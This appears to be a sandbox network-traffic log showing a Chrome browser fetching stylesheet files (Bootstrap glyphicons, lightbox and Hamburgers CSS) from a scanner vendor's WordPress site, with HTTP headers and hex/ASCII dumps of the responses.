                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 7d 73 75 70 7b 74 6f 70 3a 2d 2e 35 65 6d 7d 73 75 62 7b 62 6f 74 74 6f 6d 3a 2d 2e 32 35 65 6d 7d 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 66 69 67 75 72 65 7b 6d 61 72 67 69 6e 3a 31 65 6d 20 34 30 70 78 7d 68 72 7b 68 65 69 67 68 74 3a 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 7d 70 72 65 7b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a
                                                                                                                                                                                              Data Ascii: lign:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{height:0;-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box}pre{overflow:auto}code,kbd,pre,samp{font-family:
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 2a 21 20 53 6f 75 72 63 65 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 68 35 62 70 2f 68 74 6d 6c 35 2d 62 6f 69 6c 65 72 70 6c 61 74 65 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 73 72 63 2f 63 73 73 2f 6d 61 69 6e 2e 63 73 73 20 2a 2f 40 6d 65 64 69 61 20 70 72 69 6e 74 7b 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 21 69 6d 70 6f 72 74 61 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 2c 61 3a 76 69 73 69
                                                                                                                                                                                              Data Ascii: *! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */@media print{*,:after,:before{color:#000!important;text-shadow:none!important;background:0 0!important;-webkit-box-shadow:none!important;box-shadow:none!important}a,a:visi
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6c 61 72 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 7d 2e 67 6c 79 70 68 69 63 6f 6e 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 31 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 47 6c 79 70 68 69 63 6f 6e 73 20 48 61 6c 66 6c 69 6e 67 73 27 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 61 73 74 65 72 69 73 6b 3a 62 65 66 6f 72 65
                                                                                                                                                                                              Data Ascii: lar) format('svg')}.glyphicon{position:relative;top:1px;display:inline-block;font-family:'Glyphicons Halflings';font-style:normal;font-weight:400;line-height:1;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.glyphicon-asterisk:before
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 74 3a 22 5c 65 30 32 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 69 6d 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 64 6f 77 6e 6c 6f 61 64 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 64 6f 77 6e 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 75 70 6c 6f 61 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 32 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 6e 62 6f 78 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30
                                                                                                                                                                                              Data Ascii: t:"\e022"}.glyphicon-time:before{content:"\e023"}.glyphicon-road:before{content:"\e024"}.glyphicon-download-alt:before{content:"\e025"}.glyphicon-download:before{content:"\e026"}.glyphicon-upload:before{content:"\e027"}.glyphicon-inbox:before{content:"\e0
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6e 2d 61 6c 69 67 6e 2d 6a 75 73 74 69 66 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6c 69 73 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 6e 64 65 6e 74 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 69 6e 64 65 6e 74 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 66 61 63 65 74 69 6d 65 2d 76 69 64 65 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 35 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 70 69 63 74 75 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22
                                                                                                                                                                                              Data Ascii: n-align-justify:before{content:"\e055"}.glyphicon-list:before{content:"\e056"}.glyphicon-indent-left:before{content:"\e057"}.glyphicon-indent-right:before{content:"\e058"}.glyphicon-facetime-video:before{content:"\e059"}.glyphicon-picture:before{content:"
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 72 65 6d 6f 76 65 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 6f 6b 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 38 39 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 61 6e 2d 63 69 72 63 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 39 30 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 61 72 72 6f 77 2d 6c 65 66 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 39 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 61 72 72 6f 77 2d 72 69 67 68 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 30 39 32 22 7d 2e 67 6c 79 70 68 69 63 6f
                                                                                                                                                                                              Data Ascii: e{content:"\e087"}.glyphicon-remove-circle:before{content:"\e088"}.glyphicon-ok-circle:before{content:"\e089"}.glyphicon-ban-circle:before{content:"\e090"}.glyphicon-arrow-left:before{content:"\e091"}.glyphicon-arrow-right:before{content:"\e092"}.glyphico
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 64 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 32 31 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 75 6c 6c 68 6f 72 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 32 32 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 62 65 6c 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 32 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 63 65 72 74 69 66 69 63 61 74 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 32 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 75 6d 62 73 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 32 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 74 68 75 6d 62 73 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 32 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d
                                                                                                                                                                                              Data Ascii: dd:before{content:"\e121"}.glyphicon-bullhorn:before{content:"\e122"}.glyphicon-bell:before{content:"\e123"}.glyphicon-certificate:before{content:"\e124"}.glyphicon-thumbs-up:before{content:"\e125"}.glyphicon-thumbs-down:before{content:"\e126"}.glyphicon-
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 62 79 2d 6f 72 64 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 35 33 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 6f 72 74 2d 62 79 2d 6f 72 64 65 72 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 35 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 6f 72 74 2d 62 79 2d 61 74 74 72 69 62 75 74 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 35 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 6f 72 74 2d 62 79 2d 61 74 74 72 69 62 75 74 65 73 2d 61 6c 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 35 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 75 6e 63 68 65 63 6b 65 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 35 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 65 78 70 61 6e 64
                                                                                                                                                                                              Data Ascii: by-order:before{content:"\e153"}.glyphicon-sort-by-order-alt:before{content:"\e154"}.glyphicon-sort-by-attributes:before{content:"\e155"}.glyphicon-sort-by-attributes-alt:before{content:"\e156"}.glyphicon-unchecked:before{content:"\e157"}.glyphicon-expand
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 74 6f 77 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 38 34 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 74 61 74 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 38 35 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 64 2d 76 69 64 65 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 38 36 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 68 64 2d 76 69 64 65 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 38 37 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 75 62 74 69 74 6c 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 38 38 22 7d 2e 67 6c 79 70 68 69 63 6f 6e 2d 73 6f 75 6e 64 2d 73 74 65 72 65 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 65 31 38 39 22 7d 2e 67 6c 79 70 68 69 63 6f
                                                                                                                                                                                              Data Ascii: tower:before{content:"\e184"}.glyphicon-stats:before{content:"\e185"}.glyphicon-sd-video:before{content:"\e186"}.glyphicon-hd-video:before{content:"\e187"}.glyphicon-subtitles:before{content:"\e188"}.glyphicon-sound-stereo:before{content:"\e189"}.glyphico


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.549717141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:14 UTC581OUTGET /wp-content/themes/ambir/css/lightbox.min.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:15 UTC476INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:15 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:05 GMT
                                                                                                                                                                                              ETag: W/"651c3a0d-af0"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13803
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f71dd944349-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:15 UTC893INData Raw: 61 66 30 0d 0a 2e 6c 62 2d 6c 6f 61 64 65 72 2c 2e 6c 69 67 68 74 62 6f 78 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 7d 62 6f 64 79 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 63 6c 6f 73 65 2e 70 6e 67 29 20 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 6c 6f 61 64 69 6e 67 2e 67 69 66 29 20 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 70 72 65 76 2e 70 6e 67 29 20 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 6e 65 78 74 2e 70 6e 67 29 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 6c 62 2d 64 61 74 61 43 6f 6e 74 61 69 6e 65 72 3a 61 66 74 65 72 2c 2e 6c 62 2d 6f 75 74 65 72 43 6f 6e 74 61 69 6e 65 72 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 22 3b 63 6c 65 61 72
                                                                                                                                                                                              Data Ascii: af0.lb-loader,.lightbox{text-align:center;line-height:0}body:after{content:url(../images/close.png) url(../images/loading.gif) url(../images/prev.png) url(../images/next.png);display:none}.lb-dataContainer:after,.lb-outerContainer:after{content:"";clear
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6e 63 65 6c 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 33 32 70 78 3b 68 65 69 67 68 74 3a 33 32 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2e 2e 2f 69 6d 61 67 65 73 2f 6c 6f 61 64 69 6e 67 2e 67 69 66 29 20 6e 6f 2d 72 65 70 65 61 74 7d 2e 6c 62 2d 6e 61 76 7b 74 6f 70 3a 30 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 3b 7a 2d 69 6e 64 65 78 3a 31 30 7d 2e 6c 62 2d 63 6f 6e 74 61 69 6e 65 72 3e 2e 6e 61 76 7b 6c 65 66 74 3a 30 7d 2e 6c 62 2d 6e 61 76 20 61 7b 6f 75 74 6c 69 6e 65 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 67 69 66 3b 62 61 73 65 36 34 2c 52 30 6c 47 4f 44 6c 68 41 51 41 42 41 50
                                                                                                                                                                                              Data Ascii: ncel{display:block;width:32px;height:32px;margin:0 auto;background:url(../images/loading.gif) no-repeat}.lb-nav{top:0;height:100%;width:100%;z-index:10}.lb-container>.nav{left:0}.lb-nav a{outline:0;background-image:url(data:image/gif;base64,R0lGODlhAQABAP
                                                                                                                                                                                              2024-11-20 20:28:15 UTC545INData Raw: 2d 68 65 69 67 68 74 3a 31 2e 31 65 6d 7d 2e 6c 62 2d 64 61 74 61 20 2e 6c 62 2d 63 61 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 65 6d 7d 2e 6c 62 2d 64 61 74 61 20 2e 6c 62 2d 6e 75 6d 62 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6c 65 61 72 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 63 6f 6c 6f 72 3a 23 39 39 39 7d 2e 6c 62 2d 64 61 74 61 20 2e 6c 62 2d 63 6c 6f 73 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 66 6c 6f 61 74 3a 72 69 67 68 74 3b 77 69 64 74 68 3a 33 30 70 78 3b 68 65 69 67 68 74 3a 33 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28
                                                                                                                                                                                              Data Ascii: -height:1.1em}.lb-data .lb-caption{font-size:13px;font-weight:700;line-height:1em}.lb-data .lb-number{display:block;clear:left;padding-bottom:1em;font-size:12px;color:#999}.lb-data .lb-close{display:block;float:right;width:30px;height:30px;background:url(
                                                                                                                                                                                              2024-11-20 20:28:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.549715141.193.213.104431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:14 UTC579OUTGET /wp-content/themes/ambir/css/hamburgers.css HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                              Referer: https://ambir.com/ambir-card-scanners/
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              2024-11-20 20:28:15 UTC477INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:15 GMT
                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Tue, 03 Oct 2023 15:58:06 GMT
                                                                                                                                                                                              ETag: W/"651c3a0e-6b06"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 13803
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2f720f910f41-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:15 UTC892INData Raw: 36 62 30 36 0d 0a 2f 2a 21 0a 20 2a 20 48 61 6d 62 75 72 67 65 72 73 0a 20 2a 20 40 64 65 73 63 72 69 70 74 69 6f 6e 20 54 61 73 74 79 20 43 53 53 2d 61 6e 69 6d 61 74 65 64 20 68 61 6d 62 75 72 67 65 72 73 0a 20 2a 20 40 61 75 74 68 6f 72 20 4a 6f 6e 61 74 68 61 6e 20 53 75 68 20 40 6a 6f 6e 73 75 68 0a 20 2a 20 40 73 69 74 65 20 68 74 74 70 73 3a 2f 2f 6a 6f 6e 73 75 68 2e 63 6f 6d 2f 68 61 6d 62 75 72 67 65 72 73 0a 20 2a 20 40 6c 69 6e 6b 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6a 6f 6e 73 75 68 2f 68 61 6d 62 75 72 67 65 72 73 0a 20 2a 2f 0a 2e 68 61 6d 62 75 72 67 65 72 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 31 35 70 78 20 31 35 70 78 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 63 75
                                                                                                                                                                                              Data Ascii: 6b06/*! * Hamburgers * @description Tasty CSS-animated hamburgers * @author Jonathan Suh @jonsuh * @site https://jonsuh.com/hamburgers * @link https://github.com/jonsuh/hamburgers */.hamburger { padding: 15px 15px; display: inline-block; cu
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 6e 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 70 78 3b 20 7d 0a 20 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 2c 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 62 65 66 6f 72 65 2c 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 77 69 64 74 68 3a 20 34 30 70 78 3b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 34 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 2d
                                                                                                                                                                                              Data Ascii: ner { display: block; top: 50%; margin-top: -2px; } .hamburger-inner, .hamburger-inner::before, .hamburger-inner::after { width: 40px; height: 4px; background-color: #fff; border-radius: 4px; position: absolute; transition-
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 7d 0a 0a 2e 68 61 6d 62 75 72 67 65 72 2d 2d 33 64 78 2d 72 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 20 7b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 74 72 61 6e 73 66 6f 72 6d 20 30 2e 31 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 34 35 2c 20 30 2e 30 34 35 2c 20 30 2e 33 35 35 2c 20 31 29 2c 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 30 73 20 30 2e 31 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 34 35 2c 20 30 2e 30 34 35 2c 20 30 2e 33 35 35 2c 20 31 29 3b 20 7d 0a 20 20 2e 68 61 6d 62 75 72 67 65 72 2d 2d 33 64 78 2d 72 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a 62 65 66 6f 72 65 2c 20 2e 68 61 6d 62 75 72 67 65 72 2d 2d 33 64 78 2d 72 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 3a 3a
                                                                                                                                                                                              Data Ascii: }.hamburger--3dx-r .hamburger-inner { transition: transform 0.15s cubic-bezier(0.645, 0.045, 0.355, 1), background-color 0s 0.1s cubic-bezier(0.645, 0.045, 0.355, 1); } .hamburger--3dx-r .hamburger-inner::before, .hamburger--3dx-r .hamburger-inner::
                                                                                                                                                                                              2024-11-20 20:28:15 UTC1369INData Raw: 65 72 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 20 2d 31 30 70 78 2c 20 30 29 20 72 6f 74 61 74 65 28 2d 34 35 64 65 67 29 3b 20 7d 0a 0a 2f 2a 0a 20 20 20 2a 20 33 44 59 20 52 65 76 65 72 73 65 0a 20 20 20 2a 2f 0a 2e 68 61 6d 62 75 72 67 65 72 2d 2d 33 64 79 2d 72 20 2e 68 61 6d 62 75 72 67 65 72 2d 62 6f 78 20 7b 0a 20 20 70 65 72 73 70 65 63 74 69 76 65 3a 20 38 30 70 78 3b 20 7d 0a 0a 2e 68 61 6d 62 75 72 67 65 72 2d 2d 33 64 79 2d 72 20 2e 68 61 6d 62 75 72 67 65 72 2d 69 6e 6e 65 72 20 7b 0a 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 74 72 61 6e 73 66 6f 72 6d 20 30 2e 31 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 34 35 2c 20 30 2e 30 34 35 2c 20 30 2e 33 35 35
                                                                                                                                                                                              Data Ascii: er::after { transform: translate3d(0, -10px, 0) rotate(-45deg); }/* * 3DY Reverse */.hamburger--3dy-r .hamburger-box { perspective: 80px; }.hamburger--3dy-r .hamburger-inner { transition: transform 0.15s cubic-bezier(0.645, 0.045, 0.355
